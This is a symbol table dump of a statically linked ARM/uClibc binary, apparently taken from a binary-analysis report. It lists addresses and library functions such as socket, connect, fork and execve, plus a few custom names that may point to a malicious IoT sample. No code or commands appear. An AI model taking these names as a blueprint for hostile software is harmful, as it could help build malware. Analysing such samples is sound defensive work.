                                                  $a.symtab0x1b51c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1b6500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bae00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1baf00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bbe00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bc040NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bce40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bdd40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bec00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bf040NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bf500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1bfc80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c0080NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c1000NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c1780NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c1e00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c4340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c4400NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c4780NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c4d00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c5280NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c5340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c67c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c6a00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c8600NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c8b80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c9800NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1c9b00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1ca540NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1ca900NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1cb400NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1cb800NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1cbf00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1d00c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1d4a80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1d5e80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x81280NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x278680NOTYPE<unknown>DEFAULT10
                                                  $d.symtab0x81800NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x278640NOTYPE<unknown>DEFAULT9
                                                  $d.symtab0x81c40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x83200NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x847c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x8b680NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x92340NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x98500NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x9c4c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xa63c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xac540NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xb34c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xba900NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xc2440NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1d7140NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0x1d7380NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0xc6400NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xce1c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xd2540NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xd8b00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xd90c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xda640NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xdca80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xdea40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x2791c0NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0xdef00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xe1180NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xe2540NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xe3a40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xe50c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xe57c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x279200NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x1e1180NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0xe6080NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xf0e00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x279e80NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x279ec0NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x279f00NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x1e5240NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0x1e5500NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0xf1b40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xf1f40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xf2e40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xf34c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xf4800NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xf5640NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xf60c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x279f40NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x279f80NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0xfb680NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xfc040NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xfca40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0xfd780NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x279fc0NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x100640NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1035c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x103b80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x103d80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x105180NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x10a380NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x10af40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x10b4c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x10c8c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x10e980NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x10fc80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x00NOTYPE<unknown>DEFAULT21
                                                  $d.symtab0x200NOTYPE<unknown>DEFAULT21
                                                  $d.symtab0x260NOTYPE<unknown>DEFAULT21
                                                  $d.symtab0x2c0NOTYPE<unknown>DEFAULT21
                                                  $d.symtab0x4c0NOTYPE<unknown>DEFAULT21
                                                  $d.symtab0x530NOTYPE<unknown>DEFAULT21
                                                  $d.symtab0x116800NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x120280NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x580NOTYPE<unknown>DEFAULT21
                                                  $d.symtab0x00NOTYPE<unknown>DEFAULT23
                                                  $d.symtab0x23c0NOTYPE<unknown>DEFAULT21
                                                  $d.symtab0xe390NOTYPE<unknown>DEFAULT23
                                                  $d.symtab0x1295c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12a100NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12afc0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12b480NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12bac0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12bf00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12c440NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12c7c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12cf40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12d500NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12d980NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12dd80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12e100NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12e540NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12ed40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12f180NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x12fa40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x130080NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x130480NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x130b80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x131300NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x133a40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x134880NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x135480NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x135fc0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1e6800NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0x136d80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1371c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x13a400NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x13ac80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x13c300NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x140640NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x141080NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x142600NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x27a040NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x27a000NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x14b980NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1e6f00NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0x14e4c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x14e980NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x153e40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x27ae80NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x1e6f80NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0x157c40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x15b740NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x15d1c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x15f380NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x161a00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1e77c0NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0x161d80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1627c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x162e40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x163580NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1639c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x163e00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x164540NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x164980NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x164e00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x165240NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x165640NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x165d40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x166200NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x166a40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x166e80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x167580NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x167a40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1682c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x168740NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x168b80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1724c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x27aec0NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x173940NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x177500NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x17bf40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x17c480NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x17d640NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x27b040NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x17e180NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x17ed00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x17f900NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x180340NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x27b1c0NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x27bb40NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x180dc0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x181ac0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x182a00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x183900NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1f2e80NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0x185a00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x186540NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x27bc80NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x1879c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x18db80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x191880NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x192dc0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1931c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x193300NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x193c00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x194500NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x194e00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x196cc0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x197800NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x197e00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x198340NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x19be00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x27be00NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x19ca00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x19cd00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x19d500NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x19df00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x19e7c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x19eb80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x19fa00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x19ff00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a0300NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a0700NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a0d80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a1280NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a2040NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a5b40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a6ec0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a7c80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1a9e40NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1b3b80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1f6900NOTYPE<unknown>DEFAULT4
                                                  $d.symtab0x1b6400NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1bbd80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1bcdc0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1bdcc0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1beb80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c0f80NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c1600NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c1d00NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c40c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c46c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c51c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c6740NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c85c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1c97c0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1ca500NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1cb380NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x1cbec0NOTYPE<unknown>DEFAULT2
                                                  $d.symtab0x27bec0NOTYPE<unknown>DEFAULT13
                                                  $d.symtab0x1f3780NOTYPE<unknown>DEFAULT4
                                                  C.11.5548.symtab0x1f35412OBJECT<unknown>DEFAULT4
                                                  C.4.4620.symtab0x1e118120OBJECT<unknown>DEFAULT4
                                                  C.48.5102.symtab0x1d73844OBJECT<unknown>DEFAULT4
                                                  C.49.5103.symtab0x1d71436OBJECT<unknown>DEFAULT4
                                                  C.5.5083.symtab0x1e68024OBJECT<unknown>DEFAULT4
                                                  C.7.5370.symtab0x1f36012OBJECT<unknown>DEFAULT4
                                                  C.7.6078.symtab0x1e69812OBJECT<unknown>DEFAULT4
                                                  C.7.6109.symtab0x1e6c812OBJECT<unknown>DEFAULT4
                                                  C.7.6182.symtab0x1e6a412OBJECT<unknown>DEFAULT4
                                                  C.8.6110.symtab0x1e6bc12OBJECT<unknown>DEFAULT4
                                                  C.9.5802.symtab0x1e55064OBJECT<unknown>DEFAULT4
                                                  C.9.6119.symtab0x1e6b012OBJECT<unknown>DEFAULT4
                                                  FUCKED_rand.symtab0xf1f8252FUNC<unknown>DEFAULT2
                                                  GET_UID.symtab0x2e76c1OBJECT<unknown>DEFAULT14
                                                  LOCAL_ADDR.symtab0x2e7684OBJECT<unknown>DEFAULT14
                                                  Laligned.symtab0x15e180NOTYPE<unknown>DEFAULT2
                                                  Llastword.symtab0x15e340NOTYPE<unknown>DEFAULT2
                                                  Q.symtab0x27c6416384OBJECT<unknown>DEFAULT14
                                                  _Exit.symtab0x12b4c104FUNC<unknown>DEFAULT2
                                                  _GLOBAL_OFFSET_TABLE_.symtab0x278700OBJECT<unknown>HIDDEN12
                                                  _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _Unwind_Complete.symtab0x114344FUNC<unknown>HIDDEN2
                                                  _Unwind_DeleteException.symtab0x1143844FUNC<unknown>HIDDEN2
                                                  _Unwind_ForcedUnwind.symtab0x120e836FUNC<unknown>HIDDEN2
                                                  _Unwind_GetCFA.symtab0x1142c8FUNC<unknown>HIDDEN2
                                                  _Unwind_GetDataRelBase.symtab0x1147012FUNC<unknown>HIDDEN2
                                                  _Unwind_GetLanguageSpecificData.symtab0x1210c68FUNC<unknown>HIDDEN2
                                                  _Unwind_GetRegionStart.symtab0x128ac52FUNC<unknown>HIDDEN2
                                                  _Unwind_GetTextRelBase.symtab0x1146412FUNC<unknown>HIDDEN2
                                                  _Unwind_RaiseException.symtab0x1207c36FUNC<unknown>HIDDEN2
                                                  _Unwind_Resume.symtab0x120a036FUNC<unknown>HIDDEN2
                                                  _Unwind_Resume_or_Rethrow.symtab0x120c436FUNC<unknown>HIDDEN2
                                                  _Unwind_VRS_Get.symtab0x1139476FUNC<unknown>HIDDEN2
                                                  _Unwind_VRS_Pop.symtab0x119ac324FUNC<unknown>HIDDEN2
                                                  _Unwind_VRS_Set.symtab0x113e076FUNC<unknown>HIDDEN2
                                                  _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  __C_ctype_b.symtab0x27bec4OBJECT<unknown>DEFAULT13
                                                  __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  __C_ctype_b_data.symtab0x1f378768OBJECT<unknown>DEFAULT4
                                                  __EH_FRAME_BEGIN__.symtab0x278600OBJECT<unknown>DEFAULT7
                                                  __FRAME_END__.symtab0x278600OBJECT<unknown>DEFAULT7
                                                  __GI___C_ctype_b.symtab0x27bec4OBJECT<unknown>HIDDEN13
                                                  __GI___close.symtab0x19350100FUNC<unknown>HIDDEN2
                                                  __GI___close_nocancel.symtab0x1933424FUNC<unknown>HIDDEN2
                                                  __GI___ctype_b.symtab0x27bf04OBJECT<unknown>HIDDEN13
                                                  __GI___errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __GI___fcntl_nocancel.symtab0x12980152FUNC<unknown>HIDDEN2
                                                  __GI___fgetc_unlocked.symtab0x1b51c300FUNC<unknown>HIDDEN2
                                                  __GI___glibc_strerror_r.symtab0x1608c24FUNC<unknown>HIDDEN2
                                                  __GI___libc_close.symtab0x19350100FUNC<unknown>HIDDEN2
                                                  __GI___libc_fcntl.symtab0x12a18244FUNC<unknown>HIDDEN2
                                                  __GI___libc_open.symtab0x193e0100FUNC<unknown>HIDDEN2
                                                  __GI___libc_read.symtab0x19500100FUNC<unknown>HIDDEN2
                                                  __GI___libc_write.symtab0x19470100FUNC<unknown>HIDDEN2
                                                  __GI___longjmp.symtab0x19cd420FUNC<unknown>HIDDEN2
                                                  __GI___open.symtab0x193e0100FUNC<unknown>HIDDEN2
                                                  __GI___open_nocancel.symtab0x193c424FUNC<unknown>HIDDEN2
                                                  __GI___pthread_cleanup_upto.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __GI___pthread_unwind.symtab0x10b0484FUNC<unknown>HIDDEN2
                                                  __GI___pthread_unwind_next.symtab0x10b5816FUNC<unknown>HIDDEN2
                                                  __GI___read.symtab0x19500100FUNC<unknown>HIDDEN2
                                                  __GI___read_nocancel.symtab0x194e424FUNC<unknown>HIDDEN2
                                                  __GI___uClibc_fini.symtab0x19718124FUNC<unknown>HIDDEN2
                                                  __GI___uClibc_init.symtab0x197e888FUNC<unknown>HIDDEN2
                                                  __GI___write.symtab0x19470100FUNC<unknown>HIDDEN2
                                                  __GI___write_nocancel.symtab0x1945424FUNC<unknown>HIDDEN2
                                                  __GI___xpg_strerror_r.symtab0x160a4268FUNC<unknown>HIDDEN2
                                                  __GI__exit.symtab0x12b4c104FUNC<unknown>HIDDEN2
                                                  __GI_abort.symtab0x17c50296FUNC<unknown>HIDDEN2
                                                  __GI_accept.symtab0x162ec116FUNC<unknown>HIDDEN2
                                                  __GI_atoi.symtab0x1839c32FUNC<unknown>HIDDEN2
                                                  __GI_bind.symtab0x1636068FUNC<unknown>HIDDEN2
                                                  __GI_brk.symtab0x1c4d088FUNC<unknown>HIDDEN2
                                                  __GI_close.symtab0x19350100FUNC<unknown>HIDDEN2
                                                  __GI_closedir.symtab0x132b0272FUNC<unknown>HIDDEN2
                                                  __GI_config_close.symtab0x1a54052FUNC<unknown>HIDDEN2
                                                  __GI_config_open.symtab0x1a57472FUNC<unknown>HIDDEN2
                                                  __GI_config_read.symtab0x1a218808FUNC<unknown>HIDDEN2
                                                  __GI_connect.symtab0x163e8116FUNC<unknown>HIDDEN2
                                                  __GI_execve.symtab0x12bb464FUNC<unknown>HIDDEN2
                                                  __GI_exit.symtab0x185b0196FUNC<unknown>HIDDEN2
                                                  __GI_fclose.symtab0x13720816FUNC<unknown>HIDDEN2
                                                  __GI_fcntl.symtab0x12a18244FUNC<unknown>HIDDEN2
                                                  __GI_fflush_unlocked.symtab0x157e0940FUNC<unknown>HIDDEN2
                                                  __GI_fgetc.symtab0x1b3d8324FUNC<unknown>HIDDEN2
                                                  __GI_fgetc_unlocked.symtab0x1b51c300FUNC<unknown>HIDDEN2
                                                  __GI_fgets.symtab0x15414284FUNC<unknown>HIDDEN2
                                                  __GI_fgets_unlocked.symtab0x15b8c160FUNC<unknown>HIDDEN2
                                                  __GI_fopen.symtab0x13a5032FUNC<unknown>HIDDEN2
                                                  __GI_fork.symtab0x18de4972FUNC<unknown>HIDDEN2
                                                  __GI_fprintf.symtab0x13ad448FUNC<unknown>HIDDEN2
                                                  __GI_fputs_unlocked.symtab0x15c2c56FUNC<unknown>HIDDEN2
                                                  __GI_fseek.symtab0x1c67c36FUNC<unknown>HIDDEN2
                                                  __GI_fseeko64.symtab0x1c6a0448FUNC<unknown>HIDDEN2
                                                  __GI_fstat.symtab0x19cf0100FUNC<unknown>HIDDEN2
                                                  __GI_fwrite_unlocked.symtab0x15c64188FUNC<unknown>HIDDEN2
                                                  __GI_getc_unlocked.symtab0x1b51c300FUNC<unknown>HIDDEN2
                                                  __GI_getdtablesize.symtab0x19df444FUNC<unknown>HIDDEN2
                                                  __GI_getegid.symtab0x19e2020FUNC<unknown>HIDDEN2
                                                  __GI_geteuid.symtab0x19e3420FUNC<unknown>HIDDEN2
                                                  __GI_getgid.symtab0x19e4820FUNC<unknown>HIDDEN2
                                                  __GI_getpagesize.symtab0x19e5c40FUNC<unknown>HIDDEN2
                                                  __GI_getpid.symtab0x191b072FUNC<unknown>HIDDEN2
                                                  __GI_getrlimit.symtab0x19e8456FUNC<unknown>HIDDEN2
                                                  __GI_getsockname.symtab0x1645c68FUNC<unknown>HIDDEN2
                                                  __GI_gettimeofday.symtab0x12c0864FUNC<unknown>HIDDEN2
                                                  __GI_getuid.symtab0x19ebc20FUNC<unknown>HIDDEN2
                                                  __GI_inet_addr.symtab0x1628040FUNC<unknown>HIDDEN2
                                                  __GI_inet_aton.symtab0x1c008248FUNC<unknown>HIDDEN2
                                                  __GI_initstate_r.symtab0x181b8248FUNC<unknown>HIDDEN2
                                                  __GI_ioctl.symtab0x19ed0224FUNC<unknown>HIDDEN2
                                                  __GI_isatty.symtab0x161e036FUNC<unknown>HIDDEN2
                                                  __GI_kill.symtab0x12c4856FUNC<unknown>HIDDEN2
                                                  __GI_listen.symtab0x164e864FUNC<unknown>HIDDEN2
                                                  __GI_lseek64.symtab0x1cb80112FUNC<unknown>HIDDEN2
                                                  __GI_memchr.symtab0x1baf0240FUNC<unknown>HIDDEN2
                                                  __GI_memcpy.symtab0x15d204FUNC<unknown>HIDDEN2
                                                  __GI_memmove.symtab0x1bae04FUNC<unknown>HIDDEN2
                                                  __GI_mempcpy.symtab0x1bbe036FUNC<unknown>HIDDEN2
                                                  __GI_memrchr.symtab0x1bc04224FUNC<unknown>HIDDEN2
                                                  __GI_memset.symtab0x15d30156FUNC<unknown>HIDDEN2
                                                  __GI_mmap.symtab0x19c2c124FUNC<unknown>HIDDEN2
                                                  __GI_mremap.symtab0x19fb068FUNC<unknown>HIDDEN2
                                                  __GI_munmap.symtab0x19ff464FUNC<unknown>HIDDEN2
                                                  __GI_nanosleep.symtab0x12cf896FUNC<unknown>HIDDEN2
                                                  __GI_open.symtab0x193e0100FUNC<unknown>HIDDEN2
                                                  __GI_opendir.symtab0x13490196FUNC<unknown>HIDDEN2
                                                  __GI_raise.symtab0x191f8240FUNC<unknown>HIDDEN2
                                                  __GI_random.symtab0x17d90164FUNC<unknown>HIDDEN2
                                                  __GI_random_r.symtab0x18050144FUNC<unknown>HIDDEN2
                                                  __GI_rawmemchr.symtab0x1ca90176FUNC<unknown>HIDDEN2
                                                  __GI_read.symtab0x19500100FUNC<unknown>HIDDEN2
                                                  __GI_readdir.symtab0x13604232FUNC<unknown>HIDDEN2
                                                  __GI_readdir64.symtab0x1a12c236FUNC<unknown>HIDDEN2
                                                  __GI_readlink.symtab0x12d9c64FUNC<unknown>HIDDEN2
                                                  __GI_recv.symtab0x1656c112FUNC<unknown>HIDDEN2
                                                  __GI_recvfrom.symtab0x16624136FUNC<unknown>HIDDEN2
                                                  __GI_remove.symtab0x13a70100FUNC<unknown>HIDDEN2
                                                  __GI_rmdir.symtab0x1a03464FUNC<unknown>HIDDEN2
                                                  __GI_sbrk.symtab0x1a074108FUNC<unknown>HIDDEN2
                                                  __GI_select.symtab0x12e58132FUNC<unknown>HIDDEN2
                                                  __GI_send.symtab0x166f0112FUNC<unknown>HIDDEN2
                                                  __GI_sendto.symtab0x167ac136FUNC<unknown>HIDDEN2
                                                  __GI_setsid.symtab0x12edc64FUNC<unknown>HIDDEN2
                                                  __GI_setsockopt.symtab0x1683472FUNC<unknown>HIDDEN2
                                                  __GI_setstate_r.symtab0x182b0236FUNC<unknown>HIDDEN2
                                                  __GI_sigaction.symtab0x128e0136FUNC<unknown>HIDDEN2
                                                  __GI_sigprocmask.symtab0x12f1c140FUNC<unknown>HIDDEN2
                                                  __GI_snprintf.symtab0x13b0448FUNC<unknown>HIDDEN2
                                                  __GI_socket.symtab0x1687c68FUNC<unknown>HIDDEN2
                                                  __GI_sprintf.symtab0x13b3452FUNC<unknown>HIDDEN2
                                                  __GI_srandom_r.symtab0x180e0216FUNC<unknown>HIDDEN2
